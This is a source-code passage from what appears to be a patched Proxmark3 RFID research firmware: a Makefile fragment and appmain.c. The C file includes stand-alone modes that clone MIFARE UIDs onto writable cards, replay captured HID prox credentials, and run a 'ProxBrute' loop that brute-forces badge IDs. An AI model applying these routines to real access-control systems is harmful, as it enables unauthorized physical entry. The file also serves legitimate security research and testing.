$(OBJDIR)/fullimage.elf: $(OBJDIR)/fullimage.nodata.o $(OBJDIR)/fullimage.data.o 103 | $(CC) $(LDFLAGS) -Wl,-T,ldscript,-Map,$(patsubst %.elf,%.map,$@) -o $@ $^ 104 | 105 | tarbin: $(OBJS) 106 | $(TAR) $(TARFLAGS) ../proxmark3-$(platform)-bin.tar $(OBJS:%=armsrc/%) $(OBJS:%.s19=armsrc/%.elf) 107 | 108 | clean: 109 | $(DELETE) $(OBJDIR)$(PATHSEP)*.o 110 | $(DELETE) $(OBJDIR)$(PATHSEP)*.elf 111 | $(DELETE) $(OBJDIR)$(PATHSEP)*.s19 112 | $(DELETE) $(OBJDIR)$(PATHSEP)*.map 113 | $(DELETE) $(OBJDIR)$(PATHSEP)*.d 114 | $(DELETE) $(OBJDIR)$(PATHSEP)*.z 115 | $(DELETE) $(OBJDIR)$(PATHSEP)*.bin 116 | $(DELETE) version.c 117 | 118 | .PHONY: all clean help 119 | help: 120 | @echo Multi-OS Makefile, you are running on $(DETECTED_OS) 121 | @echo Possible targets: 122 | @echo + all - Build the full image $(OBJDIR)/fullimage.s19 123 | @echo + clean - Clean $(OBJDIR) 124 | 125 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/patch/armsrc/appmain.c: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Jonathan Westhues, Mar 2006 3 | // Edits by Gerhard de Koning Gans, Sep 2007 (##) 4 | // 5 | // This code is licensed to you under the terms of the GNU GPL, version 2 or, 6 | // at your option, any later version. See the LICENSE.txt file for the text of 7 | // the license. 8 | //----------------------------------------------------------------------------- 9 | // The main application code. This is the first thing called after start.c 10 | // executes. 11 | //----------------------------------------------------------------------------- 12 | 13 | #include "usb_cdc.h" 14 | #include "cmd.h" 15 | 16 | #include "proxmark3.h" 17 | #include "apps.h" 18 | #include "util.h" 19 | #include "printf.h" 20 | #include "string.h" 21 | 22 | #include 23 | 24 | #include "legicrf.h" 25 | #include 26 | #include 27 | #include "lfsampling.h" 28 | #include "BigBuf.h" 29 | #include "mifareutil.h" 30 | #include "pcf7931.h" 31 | #ifdef WITH_LCD 32 | #include "LCD.h" 33 | #endif 34 | 35 | // Craig Young - 14a stand-alone code 36 | #ifdef WITH_ISO14443a_StandAlone 37 | #include "iso14443a.h" 38 | #endif 39 | 40 | //============================================================================= 41 | // A buffer where we can queue things up to be sent through the FPGA, for 42 | // any purpose (fake tag, as reader, whatever). We go MSB first, since that 43 | // is the order in which they go out on the wire. 44 | //============================================================================= 45 | 46 | #define TOSEND_BUFFER_SIZE (9*MAX_FRAME_SIZE + 1 + 1 + 2) // 8 data bits and 1 parity bit per payload byte, 1 correction bit, 1 SOC bit, 2 EOC bits 47 | uint8_t ToSend[TOSEND_BUFFER_SIZE]; 48 | int ToSendMax; 49 | static int ToSendBit; 50 | struct common_area common_area __attribute__((section(".commonarea"))); 51 | 52 | void ToSendReset(void) 53 | { 54 | ToSendMax = -1; 55 | ToSendBit = 8; 56 | } 57 | 58 | void ToSendStuffBit(int b) 59 | { 60 | if(ToSendBit >= 8) { 61 | ToSendMax++; 62 | ToSend[ToSendMax] = 0; 63 | ToSendBit = 0; 64 | } 65 | 66 | if(b) { 67 | ToSend[ToSendMax] |= (1 << (7 - ToSendBit)); 68 | } 69 | 70 | ToSendBit++; 71 | 72 | if(ToSendMax >= sizeof(ToSend)) { 73 | ToSendBit = 0; 74 | DbpString("ToSendStuffBit overflowed!"); 75 | } 76 | } 77 | 78 | //============================================================================= 79 | // Debug print functions, to go out over USB, to the usual PC-side client. 80 | //============================================================================= 81 | 82 | void DbpString(char *str) 83 | { 84 | byte_t len = strlen(str); 85 | cmd_send(CMD_DEBUG_PRINT_STRING,len,0,0,(byte_t*)str,len); 86 | } 87 | 88 | #if 0 89 | void DbpIntegers(int x1, int x2, int x3) 90 | { 91 | cmd_send(CMD_DEBUG_PRINT_INTEGERS,x1,x2,x3,0,0); 92 | } 93 | #endif 94 | 95 | void Dbprintf(const char *fmt, ...) { 96 | // should probably limit size here; oh well, let's just use a big buffer 97 | char output_string[128]; 98 | va_list ap; 99 | 100 | va_start(ap, fmt); 101 | kvsprintf(fmt, output_string, 10, ap); 102 | va_end(ap); 103 | 104 | DbpString(output_string); 105 | } 106 | 107 | // prints HEX & ASCII 108 | void Dbhexdump(int len, uint8_t *d, bool bAsci) { 109 | int l=0,i; 110 | char ascii[9]; 111 | 112 | while (len>0) { 113 | if (len>8) l=8; 114 | else l=len; 115 | 116 | memcpy(ascii,d,l); 117 | ascii[l]=0; 118 | 119 | // filter safe ascii 120 | for (i=0;i126) ascii[i]='.'; 122 | 123 | if (bAsci) { 124 | Dbprintf("%-8s %*D",ascii,l,d," "); 125 | } else { 126 | Dbprintf("%*D",l,d," "); 127 | } 128 | 129 | len-=8; 130 | d+=8; 131 | } 132 | } 133 | 134 | //----------------------------------------------------------------------------- 135 | // Read an ADC channel and block till it completes, then return the result 136 | // in ADC units (0 to 1023). Also a routine to average 32 samples and 137 | // return that. 138 | //----------------------------------------------------------------------------- 139 | static int ReadAdc(int ch) 140 | { 141 | uint32_t d; 142 | 143 | AT91C_BASE_ADC->ADC_CR = AT91C_ADC_SWRST; 144 | AT91C_BASE_ADC->ADC_MR = 145 | ADC_MODE_PRESCALE(63 /* was 32 */) | // ADC_CLK = MCK / ((63+1) * 2) = 48MHz / 128 = 375kHz 146 | ADC_MODE_STARTUP_TIME(1 /* was 16 */) | // Startup Time = (1+1) * 8 / ADC_CLK = 16 / 375kHz = 42,7us Note: must be > 20us 147 | ADC_MODE_SAMPLE_HOLD_TIME(15 /* was 8 */); // Sample & Hold Time SHTIM = 15 / ADC_CLK = 15 / 375kHz = 40us 148 | 149 | // Note: ADC_MODE_PRESCALE and ADC_MODE_SAMPLE_HOLD_TIME are set to the maximum allowed value. 150 | // Both AMPL_LO and AMPL_HI are very high impedance (10MOhm) outputs, the input capacitance of the ADC is 12pF (typical). This results in a time constant 151 | // of RC = 10MOhm * 12pF = 120us. Even after the maximum configurable sample&hold time of 40us the input capacitor will not be fully charged. 152 | // 153 | // The maths are: 154 | // If there is a voltage v_in at the input, the voltage v_cap at the capacitor (this is what we are measuring) will be 155 | // 156 | // v_cap = v_in * (1 - exp(-RC/SHTIM)) = v_in * (1 - exp(-3)) = v_in * 0,95 (i.e. an error of 5%) 157 | // 158 | // Note: with the "historic" values in the comments above, the error was 34% !!! 159 | 160 | AT91C_BASE_ADC->ADC_CHER = ADC_CHANNEL(ch); 161 | 162 | AT91C_BASE_ADC->ADC_CR = AT91C_ADC_START; 163 | 164 | while(!(AT91C_BASE_ADC->ADC_SR & ADC_END_OF_CONVERSION(ch))) 165 | ; 166 | d = AT91C_BASE_ADC->ADC_CDR[ch]; 167 | 168 | return d; 169 | } 170 | 171 | int AvgAdc(int ch) // was static - merlok 172 | { 173 | int i; 174 | int a = 0; 175 | 176 | for(i = 0; i < 32; i++) { 177 | a += ReadAdc(ch); 178 | } 179 | 180 | return (a + 15) >> 5; 181 | } 182 | 183 | void MeasureAntennaTuningLfOnly(int *vLf125, int *vLf134, int *peakf, int *peakv, uint8_t LF_Results[]) 184 | { 185 | int i, adcval = 0, peak = 0; 186 | 187 | /* 188 | * Sweeps the useful LF range of the proxmark from 189 | * 46.8kHz (divisor=255) to 600kHz (divisor=19) and 190 | * read the voltage in the antenna, the result left 191 | * in the buffer is a graph which should clearly show 192 | * the resonating frequency of your LF antenna 193 | * ( hopefully around 95 if it is tuned to 125kHz!) 194 | */ 195 | 196 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 197 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD); 198 | for (i=255; i>=19; i--) { 199 | WDT_HIT(); 200 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, i); 201 | SpinDelay(20); 202 | adcval = ((MAX_ADC_LF_VOLTAGE * AvgAdc(ADC_CHAN_LF)) >> 10); 203 | if (i==95) *vLf125 = adcval; // voltage at 125Khz 204 | if (i==89) *vLf134 = adcval; // voltage at 134Khz 205 | 206 | LF_Results[i] = adcval>>8; // scale int to fit in byte for graphing purposes 207 | if(LF_Results[i] > peak) { 208 | *peakv = adcval; 209 | peak = LF_Results[i]; 210 | *peakf = i; 211 | //ptr = i; 212 | } 213 | } 214 | 215 | for (i=18; i >= 0; i--) LF_Results[i] = 0; 216 | 217 | return; 218 | } 219 | 220 | void MeasureAntennaTuningHfOnly(int *vHf) 221 | { 222 | // Let the FPGA drive the high-frequency antenna around 13.56 MHz. 223 | LED_A_ON(); 224 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 225 | FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER_RX_XCORR); 226 | SpinDelay(20); 227 | *vHf = (MAX_ADC_HF_VOLTAGE * AvgAdc(ADC_CHAN_HF)) >> 10; 228 | LED_A_OFF(); 229 | 230 | return; 231 | } 232 | 233 | void MeasureAntennaTuning(int mode) 234 | { 235 | uint8_t LF_Results[256] = {0}; 236 | int peakv = 0, peakf = 0; 237 | int vLf125 = 0, vLf134 = 0, vHf = 0; // in mV 238 | 239 | LED_B_ON(); 240 | 241 | if (((mode & FLAG_TUNE_ALL) == FLAG_TUNE_ALL) && (FpgaGetCurrent() == FPGA_BITSTREAM_HF)) { 242 | // Reverse "standard" order if HF already loaded, to avoid unnecessary swap. 243 | MeasureAntennaTuningHfOnly(&vHf); 244 | MeasureAntennaTuningLfOnly(&vLf125, &vLf134, &peakf, &peakv, LF_Results); 245 | } else { 246 | if (mode & FLAG_TUNE_LF) { 247 | MeasureAntennaTuningLfOnly(&vLf125, &vLf134, &peakf, &peakv, LF_Results); 248 | } 249 | if (mode & FLAG_TUNE_HF) { 250 | MeasureAntennaTuningHfOnly(&vHf); 251 | } 252 | } 253 | 254 | cmd_send(CMD_MEASURED_ANTENNA_TUNING, vLf125 | (vLf134<<16), vHf, peakf | (peakv<<16), LF_Results, 256); 255 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 256 | LED_B_OFF(); 257 | return; 258 | } 259 | 260 | void MeasureAntennaTuningHf(void) 261 | { 262 | int vHf = 0; // in mV 263 | 264 | DbpString("Measuring HF antenna, press button to exit"); 265 | 266 | // Let the FPGA drive the high-frequency antenna around 13.56 MHz. 267 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 268 | FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER_RX_XCORR); 269 | 270 | for (;;) { 271 | SpinDelay(20); 272 | vHf = (MAX_ADC_HF_VOLTAGE * AvgAdc(ADC_CHAN_HF)) >> 10; 273 | 274 | Dbprintf("%d mV",vHf); 275 | if (BUTTON_PRESS()) break; 276 | } 277 | DbpString("cancelled"); 278 | 279 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 280 | 281 | } 282 | 283 | 284 | void ReadMem(int addr) 285 | { 286 | const uint8_t *data = ((uint8_t *)addr); 287 | 288 | Dbprintf("%x: %02x %02x %02x %02x %02x %02x %02x %02x", 289 | addr, data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7]); 290 | } 291 | 292 | /* osimage version information is linked in */ 293 | extern struct version_information version_information; 294 | /* bootrom version information is pointed to from _bootphase1_version_pointer */ 295 | extern char *_bootphase1_version_pointer, _flash_start, _flash_end, _bootrom_start, _bootrom_end, __data_src_start__; 296 | void SendVersion(void) 297 | { 298 | char temp[USB_CMD_DATA_SIZE]; /* Limited data payload in USB packets */ 299 | char VersionString[USB_CMD_DATA_SIZE] = { '\0' }; 300 | 301 | /* Try to find the bootrom version information. Expect to find a pointer at 302 | * symbol _bootphase1_version_pointer, perform slight sanity checks on the 303 | * pointer, then use it. 304 | */ 305 | char *bootrom_version = *(char**)&_bootphase1_version_pointer; 306 | if( bootrom_version < &_flash_start || bootrom_version >= &_flash_end ) { 307 | strcat(VersionString, "bootrom version information appears invalid\n"); 308 | } else { 309 | FormatVersionInformation(temp, sizeof(temp), "bootrom: ", bootrom_version); 310 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 311 | } 312 | 313 | FormatVersionInformation(temp, sizeof(temp), "os: ", &version_information); 314 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 315 | 316 | FpgaGatherVersion(FPGA_BITSTREAM_LF, temp, sizeof(temp)); 317 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 318 | FpgaGatherVersion(FPGA_BITSTREAM_HF, temp, sizeof(temp)); 319 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 320 | 321 | // Send Chip ID and used flash memory 322 | uint32_t text_and_rodata_section_size = (uint32_t)&__data_src_start__ - (uint32_t)&_flash_start; 323 | uint32_t compressed_data_section_size = common_area.arg1; 324 | cmd_send(CMD_ACK, *(AT91C_DBGU_CIDR), text_and_rodata_section_size + compressed_data_section_size, 0, VersionString, strlen(VersionString)); 325 | } 326 | 327 | // measure the USB Speed by sending SpeedTestBufferSize bytes to client and measuring the elapsed time. 328 | // Note: this mimics GetFromBigbuf(), i.e. we have the overhead of the UsbCommand structure included. 329 | void printUSBSpeed(void) 330 | { 331 | Dbprintf("USB Speed:"); 332 | Dbprintf(" Sending USB packets to client..."); 333 | 334 | #define USB_SPEED_TEST_MIN_TIME 1500 // in milliseconds 335 | uint8_t *test_data = BigBuf_get_addr(); 336 | uint32_t end_time; 337 | 338 | uint32_t start_time = end_time = GetTickCount(); 339 | uint32_t bytes_transferred = 0; 340 | 341 | LED_B_ON(); 342 | while(end_time < start_time + USB_SPEED_TEST_MIN_TIME) { 343 | cmd_send(CMD_DOWNLOADED_RAW_ADC_SAMPLES_125K, 0, USB_CMD_DATA_SIZE, 0, test_data, USB_CMD_DATA_SIZE); 344 | end_time = GetTickCount(); 345 | bytes_transferred += USB_CMD_DATA_SIZE; 346 | } 347 | LED_B_OFF(); 348 | 349 | Dbprintf(" Time elapsed: %dms", end_time - start_time); 350 | Dbprintf(" Bytes transferred: %d", bytes_transferred); 351 | Dbprintf(" USB Transfer Speed PM3 -> Client = %d Bytes/s", 352 | 1000 * bytes_transferred / (end_time - start_time)); 353 | 354 | } 355 | 356 | /** 357 | * Prints runtime information about the PM3. 358 | **/ 359 | void SendStatus(void) 360 | { 361 | BigBuf_print_status(); 362 | Fpga_print_status(); 363 | printConfig(); //LF Sampling config 364 | printUSBSpeed(); 365 | Dbprintf("Various"); 366 | Dbprintf(" MF_DBGLEVEL......%d", MF_DBGLEVEL); 367 | Dbprintf(" ToSendMax........%d",ToSendMax); 368 | Dbprintf(" ToSendBit........%d",ToSendBit); 369 | 370 | cmd_send(CMD_ACK,1,0,0,0,0); 371 | } 372 | 373 | #if defined(WITH_ISO14443a_StandAlone) || defined(WITH_LF) 374 | 375 | #define OPTS 2 376 | 377 | void StandAloneMode() 378 | { 379 | DbpString("Stand-alone mode! No PC necessary."); 380 | // Oooh pretty -- notify user we're in elite samy mode now 381 | LED(LED_RED, 200); 382 | LED(LED_ORANGE, 200); 383 | LED(LED_GREEN, 200); 384 | LED(LED_ORANGE, 200); 385 | LED(LED_RED, 200); 386 | LED(LED_ORANGE, 200); 387 | LED(LED_GREEN, 200); 388 | LED(LED_ORANGE, 200); 389 | LED(LED_RED, 200); 390 | 391 | } 392 | 393 | #endif 394 | 395 | 396 | 397 | #ifdef WITH_ISO14443a_StandAlone 398 | void StandAloneMode14a() 399 | { 400 | StandAloneMode(); 401 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 402 | 403 | int selected = 0; 404 | int playing = 0, iGotoRecord = 0, iGotoClone = 0; 405 | int cardRead[OPTS] = {0}; 406 | uint8_t readUID[10] = {0}; 407 | uint32_t uid_1st[OPTS]={0}; 408 | uint32_t uid_2nd[OPTS]={0}; 409 | uint32_t uid_tmp1 = 0; 410 | uint32_t uid_tmp2 = 0; 411 | iso14a_card_select_t hi14a_card[OPTS]; 412 | 413 | LED(selected + 1, 0); 414 | 415 | for (;;) 416 | { 417 | usb_poll(); 418 | WDT_HIT(); 419 | SpinDelay(300); 420 | 421 | if (iGotoRecord == 1 || cardRead[selected] == 0) 422 | { 423 | iGotoRecord = 0; 424 | LEDsoff(); 425 | LED(selected + 1, 0); 426 | LED(LED_RED2, 0); 427 | 428 | // record 429 | Dbprintf("Enabling iso14443a reader mode for [Bank: %u]...", selected); 430 | /* need this delay to prevent catching some weird data */ 431 | SpinDelay(500); 432 | /* Code for reading from 14a tag */ 433 | uint8_t uid[10] ={0}; 434 | uint32_t cuid; 435 | iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD); 436 | 437 | for ( ; ; ) 438 | { 439 | WDT_HIT(); 440 | if (BUTTON_PRESS()) { 441 | if (cardRead[selected]) { 442 | Dbprintf("Button press detected -- replaying card in bank[%d]", selected); 443 | break; 444 | } 445 | else if (cardRead[(selected+1)%OPTS]) { 446 | Dbprintf("Button press detected but no card in bank[%d] so playing from bank[%d]", selected, (selected+1)%OPTS); 447 | selected = (selected+1)%OPTS; 448 | break; // playing = 1; 449 | } 450 | else { 451 | Dbprintf("Button press detected but no stored tag to play. (Ignoring button)"); 452 | SpinDelay(300); 453 | } 454 | } 455 | if (!iso14443a_select_card(uid, &hi14a_card[selected], &cuid)) 456 | continue; 457 | else 458 | { 459 | Dbprintf("Read UID:"); Dbhexdump(10,uid,0); 460 | memcpy(readUID,uid,10*sizeof(uint8_t)); 461 | uint8_t *dst = (uint8_t *)&uid_tmp1; 462 | // Set UID byte order 463 | for (int i=0; i<4; i++) 464 | dst[i] = uid[3-i]; 465 | dst = (uint8_t *)&uid_tmp2; 466 | for (int i=0; i<4; i++) 467 | dst[i] = uid[7-i]; 468 | if (uid_1st[(selected+1)%OPTS] == uid_tmp1 && uid_2nd[(selected+1)%OPTS] == uid_tmp2) { 469 | Dbprintf("Card selected has same UID as what is stored in the other bank. Skipping."); 470 | } 471 | else { 472 | if (uid_tmp2) { 473 | Dbprintf("Bank[%d] received a 7-byte UID",selected); 474 | uid_1st[selected] = (uid_tmp1)>>8; 475 | uid_2nd[selected] = (uid_tmp1<<24) + (uid_tmp2>>8); 476 | } 477 | else { 478 | Dbprintf("Bank[%d] received a 4-byte UID",selected); 479 | uid_1st[selected] = uid_tmp1; 480 | uid_2nd[selected] = uid_tmp2; 481 | } 482 | break; 483 | } 484 | } 485 | } 486 | Dbprintf("ATQA = %02X%02X",hi14a_card[selected].atqa[0],hi14a_card[selected].atqa[1]); 487 | Dbprintf("SAK = %02X",hi14a_card[selected].sak); 488 | LEDsoff(); 489 | LED(LED_GREEN, 200); 490 | LED(LED_ORANGE, 200); 491 | LED(LED_GREEN, 200); 492 | LED(LED_ORANGE, 200); 493 | 494 | LEDsoff(); 495 | LED(selected + 1, 0); 496 | 497 | // Next state is replay: 498 | playing = 1; 499 | 500 | cardRead[selected] = 1; 501 | } 502 | /* MF Classic UID clone */ 503 | else if (iGotoClone==1) 504 | { 505 | iGotoClone=0; 506 | LEDsoff(); 507 | LED(selected + 1, 0); 508 | LED(LED_ORANGE, 250); 509 | 510 | 511 | // record 512 | Dbprintf("Preparing to Clone card [Bank: %x]; uid: %08x", selected, uid_1st[selected]); 513 | 514 | // wait for button to be released 515 | while(BUTTON_PRESS()) 516 | { 517 | // Delay cloning until card is in place 518 | WDT_HIT(); 519 | } 520 | Dbprintf("Starting clone. [Bank: %u]", selected); 521 | // need this delay to prevent catching some weird data 522 | SpinDelay(500); 523 | // Begin clone function here: 524 | /* Example from client/mifarehost.c for commanding a block write for "magic Chinese" cards: 525 | UsbCommand c = {CMD_MIFARE_CSETBLOCK, {wantWipe, params & (0xFE | (uid == NULL ? 0:1)), blockNo}}; 526 | memcpy(c.d.asBytes, data, 16); 527 | SendCommand(&c); 528 | 529 | Block read is similar: 530 | UsbCommand c = {CMD_MIFARE_CGETBLOCK, {params, 0, blockNo}}; 531 | We need to imitate that call with blockNo 0 to set a uid. 532 | 533 | The get and set commands are handled in this file: 534 | // Work with "magic Chinese" card 535 | case CMD_MIFARE_CSETBLOCK: 536 | MifareCSetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 537 | break; 538 | case CMD_MIFARE_CGETBLOCK: 539 | MifareCGetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 540 | break; 541 | 542 | mfCSetUID provides example logic for UID set workflow: 543 | -Read block0 from card in field with MifareCGetBlock() 544 | -Configure new values without replacing reserved bytes 545 | memcpy(block0, uid, 4); // Copy UID bytes from byte array 546 | // Mifare UID BCC 547 | block0[4] = block0[0]^block0[1]^block0[2]^block0[3]; // BCC on byte 5 548 | Bytes 5-7 are reserved SAK and ATQA for mifare classic 549 | -Use mfCSetBlock(0, block0, oldUID, wantWipe, CSETBLOCK_SINGLE_OPER) to write it 550 | */ 551 | uint8_t oldBlock0[16] = {0}, newBlock0[16] = {0}, testBlock0[16] = {0}; 552 | // arg0 = Flags == CSETBLOCK_SINGLE_OPER=0x1F, arg1=returnSlot, arg2=blockNo 553 | MifareCGetBlock(0x3F, 1, 0, oldBlock0); 554 | if (oldBlock0[0] == 0 && oldBlock0[0] == oldBlock0[1] && oldBlock0[1] == oldBlock0[2] && oldBlock0[2] == oldBlock0[3]) { 555 | Dbprintf("No changeable tag detected. Returning to replay mode for bank[%d]", selected); 556 | playing = 1; 557 | } 558 | else { 559 | Dbprintf("UID from target tag: %02X%02X%02X%02X", oldBlock0[0],oldBlock0[1],oldBlock0[2],oldBlock0[3]); 560 | memcpy(newBlock0,oldBlock0,16); 561 | // Copy uid_1st for bank (2nd is for longer UIDs not supported if classic) 562 | 563 | newBlock0[0] = uid_1st[selected]>>24; 564 | newBlock0[1] = 0xFF & (uid_1st[selected]>>16); 565 | newBlock0[2] = 0xFF & (uid_1st[selected]>>8); 566 | newBlock0[3] = 0xFF & (uid_1st[selected]); 567 | newBlock0[4] = newBlock0[0]^newBlock0[1]^newBlock0[2]^newBlock0[3]; 568 | // arg0 = needWipe, arg1 = workFlags, arg2 = blockNo, datain 569 | MifareCSetBlock(0, 0xFF,0, newBlock0); 570 | MifareCGetBlock(0x3F, 1, 0, testBlock0); 571 | if (memcmp(testBlock0,newBlock0,16)==0) 572 | { 573 | DbpString("Cloned successfull!"); 574 | cardRead[selected] = 0; // Only if the card was cloned successfully should we clear it 575 | playing = 0; 576 | iGotoRecord = 1; 577 | selected = (selected+1) % OPTS; 578 | } 579 | else { 580 | Dbprintf("Clone failed. Back to replay mode on bank[%d]", selected); 581 | playing = 1; 582 | } 583 | } 584 | LEDsoff(); 585 | LED(selected + 1, 0); 586 | 587 | } 588 | // Change where to record (or begin playing) 589 | else if (playing==1) // button_pressed == BUTTON_SINGLE_CLICK && cardRead[selected]) 590 | { 591 | LEDsoff(); 592 | LED(selected + 1, 0); 593 | 594 | // Begin transmitting 595 | if (playing) 596 | { 597 | LED(LED_GREEN, 0); 598 | DbpString("Playing"); 599 | for ( ; ; ) { 600 | WDT_HIT(); 601 | int button_action = BUTTON_HELD(1000); 602 | if (button_action == 0) { // No button action, proceed with sim 603 | uint8_t data[512] = {0}; // in case there is a read command received we shouldn't break 604 | Dbprintf("Simulating ISO14443a tag with uid[0]: %08x, uid[1]: %08x [Bank: %u]", uid_1st[selected],uid_2nd[selected],selected); 605 | if (hi14a_card[selected].sak == 8 && hi14a_card[selected].atqa[0] == 4 && hi14a_card[selected].atqa[1] == 0) { 606 | DbpString("Mifare Classic"); 607 | SimulateIso14443aTag(1,uid_1st[selected], uid_2nd[selected], data); // Mifare Classic 608 | } 609 | else if (hi14a_card[selected].sak == 0 && hi14a_card[selected].atqa[0] == 0x44 && hi14a_card[selected].atqa[1] == 0) { 610 | DbpString("Mifare Ultralight"); 611 | SimulateIso14443aTag(2,uid_1st[selected],uid_2nd[selected],data); // Mifare Ultralight 612 | } 613 | else if (hi14a_card[selected].sak == 20 && hi14a_card[selected].atqa[0] == 0x44 && hi14a_card[selected].atqa[1] == 3) { 614 | DbpString("Mifare DESFire"); 615 | SimulateIso14443aTag(3,uid_1st[selected],uid_2nd[selected],data); // Mifare DESFire 616 | } 617 | else { 618 | Dbprintf("Unrecognized tag type -- defaulting to Mifare Classic emulation"); 619 | SimulateIso14443aTag(1,uid_1st[selected], uid_2nd[selected], data); 620 | } 621 | } 622 | else if (button_action == BUTTON_SINGLE_CLICK) { 623 | selected = (selected + 1) % OPTS; 624 | Dbprintf("Done playing. Switching to record mode on bank %d",selected); 625 | iGotoRecord = 1; 626 | break; 627 | } 628 | else if (button_action == BUTTON_HOLD) { 629 | Dbprintf("Playtime over. Begin cloning..."); 630 | iGotoClone = 1; 631 | break; 632 | } 633 | WDT_HIT(); 634 | } 635 | 636 | /* We pressed a button so ignore it here with a delay */ 637 | SpinDelay(300); 638 | LEDsoff(); 639 | LED(selected + 1, 0); 640 | } 641 | else 642 | while(BUTTON_PRESS()) 643 | WDT_HIT(); 644 | } 645 | } 646 | } 647 | #elif WITH_LF 648 | // samy's sniff and repeat routine 649 | void SamyRun() 650 | { 651 | StandAloneMode(); 652 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 653 | 654 | int high[OPTS], low[OPTS]; 655 | int selected = 0; 656 | int playing = 0; 657 | int cardRead = 0; 658 | // ProxBrute Stuff: 659 | unsigned int i; 660 | unsigned int ZERO=0x00000000; 661 | // Turn on selected LED 662 | LED(selected + 1, 0); 663 | 664 | for (;;) 665 | { 666 | usb_poll(); 667 | WDT_HIT(); 668 | 669 | // Was our button held down or pressed? 670 | int button_pressed = BUTTON_HELD(1000); 671 | SpinDelay(300); 672 | 673 | // Button was held for a second, begin recording 674 | if (button_pressed > 0 && cardRead == 0) 675 | { 676 | LEDsoff(); 677 | LED(selected + 1, 0); 678 | LED(LED_RED2, 0); 679 | 680 | // record 681 | DbpString("Starting recording"); 682 | 683 | // wait for button to be released 684 | while(BUTTON_PRESS()) 685 | WDT_HIT(); 686 | 687 | /* need this delay to prevent catching some weird data */ 688 | SpinDelay(500); 689 | 690 | CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); 691 | Dbprintf("Recorded %x %x%08x", selected, high[selected], low[selected]); 692 | 693 | LEDsoff(); 694 | LED(selected + 1, 0); 695 | // Finished recording 696 | 697 | // If we were previously playing, set playing off 698 | // so next button push begins playing what we recorded 699 | playing = 0; 700 | 701 | cardRead = 1; 702 | 703 | } 704 | 705 | // Change where to record (or begin playing) 706 | else if (button_pressed) 707 | { 708 | // Next option if we were previously playing 709 | if (playing) 710 | selected = (selected + 1) % OPTS; 711 | playing = !playing; 712 | 713 | LEDsoff(); 714 | LED(selected + 1, 0); 715 | 716 | // Begin transmitting 717 | if (playing) 718 | { 719 | LED(LED_GREEN, 0); 720 | DbpString("Playing"); 721 | // wait for button to be released 722 | while(BUTTON_PRESS()) 723 | WDT_HIT(); 724 | /* START PROXBRUTE */ 725 | 726 | /* 727 | ProxBrute - brad a. - foundstone 728 | 729 | Following code is a trivial brute forcer once you read a valid tag 730 | the idea is you get a valid tag, then just try and brute force to 731 | another priv level. The problem is that it has no idea if the code 732 | worked or not, so its a crap shoot. One option is to time how long 733 | it takes to get a valid ID then start from scratch every time. 734 | */ 735 | 736 | if ( selected == 1 ) { 737 | DbpString("Entering ProxBrute Mode"); 738 | DbpString("brad a. - foundstone"); 739 | Dbprintf("Current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); 740 | LED(LED_ORANGE,0); 741 | LED(LED_RED,0); 742 | for (i=low[selected]-1;i>ZERO;i--) { 743 | if(BUTTON_PRESS()) { 744 | DbpString("Told to Stop"); 745 | break; 746 | } 747 | 748 | Dbprintf("Trying Facility = %08x ID %08x", high[selected], i); 749 | CmdHIDsimTAGProxBrute(high[selected], i, 0); 750 | SpinDelay(500); 751 | } 752 | 753 | } else { 754 | DbpString("Red is lit, not entering ProxBrute Mode"); 755 | Dbprintf("%x %x %x", selected, high[selected], low[selected]); 756 | CmdHIDsimTAG(high[selected], low[selected], 0); 757 | DbpString("Done playing"); 758 | } 759 | 760 | 761 | 762 | 763 | /* END PROXBRUTE */ 764 | 765 | if (BUTTON_HELD(1000) > 0) 766 | { 767 | DbpString("Exiting"); 768 | LEDsoff(); 769 | return; 770 | } 771 | 772 | /* We pressed a button so ignore it here with a delay */ 773 | SpinDelay(300); 774 | 775 | // when done, we're done playing, move to next option 776 | selected = (selected + 1) % OPTS; 777 | playing = !playing; 778 | LEDsoff(); 779 | LED(selected + 1, 0); 780 | } 781 | else 782 | while(BUTTON_PRESS()) 783 | WDT_HIT(); 784 | } 785 | } 786 | } 787 | 788 | #endif 789 | /* 790 | OBJECTIVE 791 | Listen and detect an external reader. Determine the best location 792 | for the antenna. 793 | 794 | INSTRUCTIONS: 795 | Inside the ListenReaderField() function, there is two mode. 796 | By default, when you call the function, you will enter mode 1. 797 | If you press the PM3 button one time, you will enter mode 2. 798 | If you press the PM3 button a second time, you will exit the function. 799 | 800 | DESCRIPTION OF MODE 1: 801 | This mode just listens for an external reader field and lights up green 802 | for HF and/or red for LF. This is the original mode of the detectreader 803 | function. 804 | 805 | DESCRIPTION OF MODE 2: 806 | This mode will visually represent, using the LEDs, the actual strength of the 807 | current compared to the maximum current detected. Basically, once you know 808 | what kind of external reader is present, it will help you spot the best location to place 809 | your antenna. You will probably not get some good results if there is a LF and a HF reader 810 | at the same place! :-) 811 | 812 | LIGHT SCHEME USED: 813 | */ 814 | static const char LIGHT_SCHEME[] = { 815 | 0x0, /* ---- | No field detected */ 816 | 0x1, /* X--- | 14% of maximum current detected */ 817 | 0x2, /* -X-- | 29% of maximum current detected */ 818 | 0x4, /* --X- | 43% of maximum current detected */ 819 | 